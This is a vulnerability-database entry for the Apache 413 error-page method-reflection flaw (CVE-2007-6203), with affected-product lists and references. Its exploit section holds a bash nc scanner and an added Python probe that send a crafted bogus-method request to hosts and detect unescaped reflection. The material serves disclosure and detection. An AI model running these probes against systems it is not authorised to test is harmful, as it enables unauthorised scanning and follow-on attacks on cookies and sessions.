ID
VAR-E-200711-0281
CVE
cve_id: | CVE-2007-6203 | Trust: 1.9 |
EDB ID
30835
TITLE
Apache 2.2.4 - 413 Error HTTP Request Method Cross-Site Scripting - Unix remote Exploit
Trust: 0.6
DESCRIPTION
Apache 2.2.4 - 413 Error HTTP Request Method Cross-Site Scripting (CVE-2007-6203; secondary reference ID 39003). Remote exploit for the Unix platform.
Trust: 0.6
AFFECTED PRODUCTS
vendor: | apache | model: | - | scope: | eq | version: | 2.2.4 | Trust: 1.0 |
vendor: | hp | model: | hp-ux b.11.31 | scope: | - | version: | - | Trust: 0.6 |
vendor: | hp | model: | hp-ux b.11.11 | scope: | - | version: | - | Trust: 0.6 |
vendor: | ubuntu | model: | linux lts sparc | scope: | eq | version: | 8.04 | Trust: 0.3 |
vendor: | ubuntu | model: | linux lts powerpc | scope: | eq | version: | 8.04 | Trust: 0.3 |
vendor: | ubuntu | model: | linux lts lpia | scope: | eq | version: | 8.04 | Trust: 0.3 |
vendor: | ubuntu | model: | linux lts i386 | scope: | eq | version: | 8.04 | Trust: 0.3 |
vendor: | ubuntu | model: | linux lts amd64 | scope: | eq | version: | 8.04 | Trust: 0.3 |
vendor: | ubuntu | model: | linux sparc | scope: | eq | version: | 7.10 | Trust: 0.3 |
vendor: | ubuntu | model: | linux powerpc | scope: | eq | version: | 7.10 | Trust: 0.3 |
vendor: | ubuntu | model: | linux lpia | scope: | eq | version: | 7.10 | Trust: 0.3 |
vendor: | ubuntu | model: | linux i386 | scope: | eq | version: | 7.10 | Trust: 0.3 |
vendor: | ubuntu | model: | linux amd64 | scope: | eq | version: | 7.10 | Trust: 0.3 |
vendor: | ubuntu | model: | linux lts sparc | scope: | eq | version: | 6.06 | Trust: 0.3 |
vendor: | ubuntu | model: | linux lts powerpc | scope: | eq | version: | 6.06 | Trust: 0.3 |
vendor: | ubuntu | model: | linux lts i386 | scope: | eq | version: | 6.06 | Trust: 0.3 |
vendor: | ubuntu | model: | linux lts amd64 | scope: | eq | version: | 6.06 | Trust: 0.3 |
vendor: | turbolinux | model: | server | scope: | eq | version: | 10.0 | Trust: 0.3 |
vendor: | turbolinux | model: | server | scope: | eq | version: | 11x64 | Trust: 0.3 |
vendor: | turbolinux | model: | server | scope: | eq | version: | 11 | Trust: 0.3 |
vendor: | turbolinux | model: | server | scope: | eq | version: | 10.0.0x64 | Trust: 0.3 |
vendor: | turbolinux | model: | personal | scope: | - | version: | - | Trust: 0.3 |
vendor: | turbolinux | model: | multimedia | scope: | - | version: | - | Trust: 0.3 |
vendor: | turbolinux | model: | fuji | scope: | eq | version: | 0 | Trust: 0.3 |
vendor: | turbolinux | model: | appliance server | scope: | eq | version: | 2.0 | Trust: 0.3 |
vendor: | suse | model: | linux enterprise server | scope: | eq | version: | 9 | Trust: 0.3 |
vendor: | suse | model: | linux enterprise server sp1 | scope: | eq | version: | 10 | Trust: 0.3 |
vendor: | suse | model: | linux enterprise sdk 10.sp1 | scope: | - | version: | - | Trust: 0.3 |
vendor: | suse | model: | opensuse | scope: | eq | version: | 10.3 | Trust: 0.3 |
vendor: | suse | model: | opensuse | scope: | eq | version: | 10.2 | Trust: 0.3 |
vendor: | suse | model: | open-enterprise-server | scope: | eq | version: | 0 | Trust: 0.3 |
vendor: | suse | model: | novell linux pos | scope: | eq | version: | 9 | Trust: 0.3 |
vendor: | suse | model: | novell linux desktop sdk | scope: | eq | version: | 9.0 | Trust: 0.3 |
vendor: | suse | model: | novell linux desktop | scope: | eq | version: | 9.0 | Trust: 0.3 |
vendor: | suse | model: | linux | scope: | eq | version: | 10.1x86-64 | Trust: 0.3 |
vendor: | suse | model: | linux | scope: | eq | version: | 10.1x86 | Trust: 0.3 |
vendor: | suse | model: | linux ppc | scope: | eq | version: | 10.1 | Trust: 0.3 |
vendor: | ibm | model: | http server | scope: | eq | version: | 6.1.15 | Trust: 0.3 |
vendor: | ibm | model: | http server | scope: | eq | version: | 6.0.2.27 | Trust: 0.3 |
vendor: | ibm | model: | http server | scope: | eq | version: | 6.0.2.13 | Trust: 0.3 |
vendor: | ibm | model: | http server | scope: | eq | version: | 2.0.47.1 | Trust: 0.3 |
vendor: | ibm | model: | http server | scope: | eq | version: | 2.0.47 | Trust: 0.3 |
vendor: | ibm | model: | http server | scope: | eq | version: | 6.1.0.13 | Trust: 0.3 |
vendor: | ibm | model: | http server | scope: | eq | version: | 6.1.0.1 | Trust: 0.3 |
vendor: | ibm | model: | http server | scope: | eq | version: | 6.1.0 | Trust: 0.3 |
vendor: | ibm | model: | http server | scope: | eq | version: | 6.0.2.23 | Trust: 0.3 |
vendor: | ibm | model: | http server | scope: | eq | version: | 6.0.2.19 | Trust: 0.3 |
vendor: | ibm | model: | http server | scope: | eq | version: | 6.0.2.12 | Trust: 0.3 |
vendor: | ibm | model: | hardware management console for pseries r1.3 | scope: | eq | version: | 6.0 | Trust: 0.3 |
vendor: | ibm | model: | hardware management console for iseries r1.3 | scope: | eq | version: | 6.0 | Trust: 0.3 |
vendor: | hp | model: | hp-ux b.11.23 | scope: | - | version: | - | Trust: 0.3 |
vendor: | gentoo | model: | linux | scope: | - | version: | - | Trust: 0.3 |
vendor: | fujitsu | model: | interstage studio enterprise edition | scope: | eq | version: | 9.0 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage studio enterprise edition | scope: | eq | version: | 8.0.1 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage job workload server | scope: | eq | version: | 8.1 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage apworks modelers-j edition | scope: | eq | version: | 7.0 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage apworks modelers-j edition 6.0a | scope: | - | version: | - | Trust: 0.3 |
vendor: | fujitsu | model: | interstage apworks modelers-j edition | scope: | eq | version: | 6.0 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server web-j edition | scope: | eq | version: | 5.0 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server standard-j edition | scope: | eq | version: | 9.1 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server standard-j edition | scope: | eq | version: | 9.0 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server standard-j edition | scope: | eq | version: | 8.0.2 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server standard-j edition | scope: | eq | version: | 8.0.1 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server standard-j edition | scope: | eq | version: | 8.0 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server standard edition | scope: | eq | version: | 5.0 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server plus developer | scope: | eq | version: | 5.0.1 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server plus developer | scope: | eq | version: | 7.0 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server plus developer | scope: | eq | version: | 6.0 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server plus | scope: | eq | version: | 7.0.1 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server plus | scope: | eq | version: | 5.0.1 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server plus | scope: | eq | version: | 7.0 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server plus | scope: | eq | version: | 6.0 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server enterprise edition | scope: | eq | version: | 9.1 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server enterprise edition a | scope: | eq | version: | 9.0 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server enterprise edition | scope: | eq | version: | 9.0 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server enterprise edition | scope: | eq | version: | 8.0.2 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server enterprise edition | scope: | eq | version: | 8.0.1 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server enterprise edition | scope: | eq | version: | 8.0 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server enterprise edition | scope: | eq | version: | 7.0.1 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server enterprise edition | scope: | eq | version: | 5.0.1 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server enterprise edition | scope: | eq | version: | 7.0 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server enterprise edition | scope: | eq | version: | 6.0 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server enterprise edition | scope: | eq | version: | 5.0 | Trust: 0.3 |
vendor: | apple | model: | mac os server | scope: | eq | version: | x10.5.2 | Trust: 0.3 |
vendor: | apple | model: | mac os server | scope: | eq | version: | x10.5.1 | Trust: 0.3 |
vendor: | apple | model: | mac os server | scope: | eq | version: | x10.5 | Trust: 0.3 |
vendor: | apple | model: | mac os | scope: | eq | version: | x10.5.2 | Trust: 0.3 |
vendor: | apple | model: | mac os | scope: | eq | version: | x10.5.1 | Trust: 0.3 |
vendor: | apple | model: | mac os | scope: | eq | version: | x10.5 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.2.4 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.2.3 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.2.2 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.2 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.1.8 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.1.7 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.1.6 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.1.5 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.1.4 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.1.3 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.1.2 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.1.1 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.1 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.0.59 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.0.58 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.0.55 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.0.54 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.0.53 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.0.52 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.0.51 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.0.50 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.0.49 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.0.48 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.0.47 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.0.46 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | ne | version: | 2.2.8 | Trust: 0.3 |
EXPLOIT
source: https://www.securityfocus.com/bid/26663/info
Apache is prone to a cross-site scripting weakness: when a request triggers a "413 Request Entity Too Large" error, the HTTP method name from the request is reflected into the error page without being HTML-escaped, so a method such as "<PROCHECKUP>" or a script tag appears verbatim in the response.
An attacker may exploit this issue to steal cookie-based authentication credentials and launch other attacks. In practice this requires a client that can send a request with an attacker-chosen method name; ordinary browser navigation cannot, which is why the issue is rated as a weakness rather than a straightforward reflected XSS.
Apache 2.0.46 through 2.2.4 are vulnerable; other versions may also be affected. The fix shipped in Apache 2.2.8 (see the 2.2.8 change log referenced below).
#!/bin/bash
# PR07-37-scan
# Probe each host in <hosts-file> for the Apache 413 error-page method reflection.
# The request uses a bogus method name plus duplicate Content-length headers so that
# Apache answers with a 413 error page; a vulnerable build echoes the method name back
# unescaped, which the grep below looks for.
if [ $# -ne 1 ]
then
    echo "$0 <hosts-file>"
    exit 1
fi
for i in $(cat "$1")
do
    if echo -en "<PROCHECKUP> / HTTP/1.1\nHost: $i\nConnection: close\nContent-length: 0\nContent-length: 0\n\n" | nc -w 4 "$i" 80 | grep -i '<PROCHECKUP>' > /dev/null
    then
        echo "$i is VULNERABLE!"
    fi
done
Trust: 1.0
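The shell scanner above only greps for the marker anywhere in the reply, so it cannot tell a verbatim reflection (vulnerable) from an HTML-escaped one (patched) and does not check that the server actually answered 413. The Python below, an added example that is not part of the exploit-db entry or of Apache's code, builds the same probe request and classifies the response on those two criteria. The two sample responses are constructed by hand to resemble a vulnerable and a patched Apache 413 page; the host names passed on the command line are whatever you choose to scan.

```python
"""Probe classifier for CVE-2007-6203 (Apache 413 error-page method reflection).

Added example, not part of the original exploit-db entry. The sample
responses below are constructed by hand, not captured from a real server.
"""
import re
import socket

MARKER = "<PROCHECKUP>"  # bogus method name; its reflection is unambiguous


def build_probe(host: str, marker: str = MARKER) -> bytes:
    """Build the same request the PR07-37 scanner sends: a bogus method plus
    duplicate Content-length headers, which makes Apache answer 413 and echo
    the method name into the error page."""
    req = (
        f"{marker} / HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        "Connection: close\r\n"
        "Content-length: 0\r\n"
        "Content-length: 0\r\n"
        "\r\n"
    )
    return req.encode("ascii")


def classify(response: bytes, marker: str = MARKER) -> str:
    """Return 'vulnerable', 'escaped' or 'no-reflection'.

    vulnerable    : status 413 and the marker appears verbatim in the body
    escaped       : the marker appears HTML-escaped (&lt;...&gt;), as in a patched build
    no-reflection : anything else (no 413, or the method is not echoed at all)
    """
    text = response.decode("latin-1", errors="replace")
    status_line, _, body = text.partition("\r\n")
    m = re.match(r"HTTP/\d\.\d (\d{3})", status_line)
    status = int(m.group(1)) if m else 0
    escaped = marker.replace("<", "&lt;").replace(">", "&gt;")
    if status == 413 and marker in body:
        return "vulnerable"
    if escaped in body:
        return "escaped"
    return "no-reflection"


def probe_host(host: str, port: int = 80, timeout: float = 4.0) -> str:
    """Send the probe over TCP and classify the reply (does network I/O)."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_probe(host))
        chunks = []
        while True:
            data = s.recv(4096)
            if not data:
                break
            chunks.append(data)
    return classify(b"".join(chunks))


# Constructed sample responses (hand-written, not captured from a server).
VULNERABLE_413 = (
    b"HTTP/1.1 413 Request Entity Too Large\r\n"
    b"Content-Type: text/html; charset=iso-8859-1\r\n"
    b"Connection: close\r\n\r\n"
    b"<html><head><title>413 Request Entity Too Large</title></head><body>"
    b"<h1>Request Entity Too Large</h1><p>The requested resource<br />/<br />"
    b"does not allow request data with <PROCHECKUP> requests, or the amount of "
    b"data provided in the request exceeds the capacity limit.</p></body></html>"
)
PATCHED_413 = VULNERABLE_413.replace(b"<PROCHECKUP>", b"&lt;PROCHECKUP&gt;")

if __name__ == "__main__":
    import sys
    for h in sys.argv[1:]:
        print(h, probe_host(h))
```

Run it as `python3 probe.py host1 host2` to scan live hosts; `classify()` is separated from the socket code so the decision logic can be exercised offline against the constructed responses.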
EXPLOIT LANGUAGE
sh
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
413 Error HTTP Request Method Cross-Site Scripting
Trust: 1.0
CREDITS
Adrian Pastor
Trust: 0.6
EXTERNAL IDS
db: | EXPLOIT-DB | id: | 30835 | Trust: 1.9 |
db: | NVD | id: | CVE-2007-6203 | Trust: 1.9 |
db: | BID | id: | 26663 | Trust: 1.9 |
db: | EDBNET | id: | 52455 | Trust: 0.6 |
REFERENCES
url: | https://nvd.nist.gov/vuln/detail/cve-2007-6203 | Trust: 1.6 |
url: | https://www.securityfocus.com/bid/26663/info | Trust: 1.0 |
url: | https://www.exploit-db.com/exploits/30835/ | Trust: 0.6 |
url: | http://www-1.ibm.com/support/docview.wss?uid=swg1pk57952 | Trust: 0.3 |
url: | http://issues.apache.org/bugzilla/show_bug.cgi?id=44014 | Trust: 0.3 |
url: | https://www.exploit-db.com/exploits/30835 | Trust: 0.3 |
url: | http://www.apache.org/dist/httpd/changes_2.2.8 | Trust: 0.3 |
url: | https://www14.software.ibm.com/webapp/set2/sas/f/hmc/power5/install/v61.readme.html#mh01110 | Trust: 0.3 |
url: | http://www.fujitsu.com/global/support/software/security/products-f/interstage-200807e.html | Trust: 0.3 |
url: | http://www-1.ibm.com/support/docview.wss?uid=swg24019245 | Trust: 0.3 |
url: | http://httpd.apache.org/ | Trust: 0.3 |
SOURCES
db: | BID | id: | 26663 |
db: | EXPLOIT-DB | id: | 30835 |
db: | EDBNET | id: | 52455 |
LAST UPDATE DATE
2022-07-27T10:02:01.375000+00:00
SOURCES UPDATE DATE
db: | BID | id: | 26663 | date: | 2014-02-11T00:26:00 |
SOURCES RELEASE DATE
db: | BID | id: | 26663 | date: | 2007-11-30T00:00:00 |
db: | EXPLOIT-DB | id: | 30835 | date: | 2007-11-30T00:00:00 |
db: | EDBNET | id: | 52455 | date: | 2007-11-30T00:00:00 |